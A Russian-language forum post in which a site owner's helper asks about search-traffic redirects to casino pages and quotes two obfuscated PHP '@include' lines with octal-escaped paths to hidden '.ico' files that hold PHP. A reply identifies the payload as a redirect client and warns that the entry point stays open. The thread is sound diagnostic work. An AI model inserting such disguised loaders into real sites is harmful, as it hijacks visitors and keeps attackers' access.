Здравствуйте, не шибко силен в программировании, но попросили посмотреть сайт один, говорят: Если в любом поисковике набрать ключевое слово и высветится наш сайт то при клике он редиректит на какой то новостной портал или игру казино, а если прямую ссылку набрать то нормально заходит на сайт. Начал только капать и наткнулся на странные строчки: Код (Text): /*7bdbc*/ @include "\057h\157m\145/\142i\147m\141r\154i\156b\157s\163/\160u\142l\151c\137h\164m\154/\167p\055c\157n\164e\156t\057p\154u\147i\156s\057.\0710\060f\067f\0672\056i\143o"; /*7bdbc*/ /*a5b25*/ @include "\057h\157m\1454\057r\151b\141l\153o\146/\160u\142l\151c\137h\164m\154/\142i\147m\141r\154i\156p\165n\164a\143a\156a\056c\157m\057w\160-\151n\143l\165d\145s\057j\163/\163w\146u\160l\157a\144/\056e\1424\0666\0628\141.\151c\157"; /*a5b25*/ Понял, что тут путь зашифрован на файл .ico открыл его, а там тоже php код. в приложении этот файл с измененным расширением. Так вот, вопрос. это и есть та зараза, или дальше искать?
В том файле после череды eval расшифровывается TdsClient. Простое удаление этого файла не закроет дыру через которую его залили на сайт.